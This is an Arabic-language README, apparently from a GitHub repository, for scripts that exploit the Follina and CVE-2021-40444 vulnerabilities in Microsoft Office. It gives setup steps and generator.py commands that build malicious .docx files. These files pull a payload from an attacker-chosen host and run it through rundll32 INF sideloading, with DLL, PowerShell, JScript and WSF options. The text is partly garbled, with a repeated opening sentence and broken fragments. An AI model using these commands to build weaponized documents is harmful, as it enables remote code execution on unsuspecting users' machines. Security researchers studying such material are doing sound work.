
يحتوي هذا المستودع على سكربتات وموارد لاستغلال ثغرات Follina CVE وCVE-2021-40444 في Microsoft Office. تولّد السكربتات ملفات مستندات ضارة يمكنها تنفيذ كود تعسفي على النظام المستهدف.
يحتوي هذا المستودع على سكربتات وموارد لاستغلال ثغرتي Follina CVE و CVE-2021-40444 في Microsoft Office. تقوم السكربتات بتوليد ملفات مستندات خبيثة يمكنها تنفيذ أكواد تعسفية على النظام الهدف.
requirements.txt)إعداد Flare VM:
labpasswordPython والبيئة الافتراضية:
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv باستخدام الأمر التالي:
pip install virtualenv
venv:
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
توليد الاستغلال:
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 بعنوان IP الخاص بك.الوصول إلى المستند المُولّد:
.docx المُولّد موجوداً في الدليل:
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx).document.xml.rels.%TEMP%Low.rundll32 بتحميل ملف INF جانبياً.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
هذا المشروع لأغراض تعليمية فقط. استخدمه بمسؤولية ولا تستغل الثغرات على أنظمة ليس لديك إذن لاختبارها. يمكن أن يؤدي إساءة استخدام هذه المعلومات إلى تهم جنائية.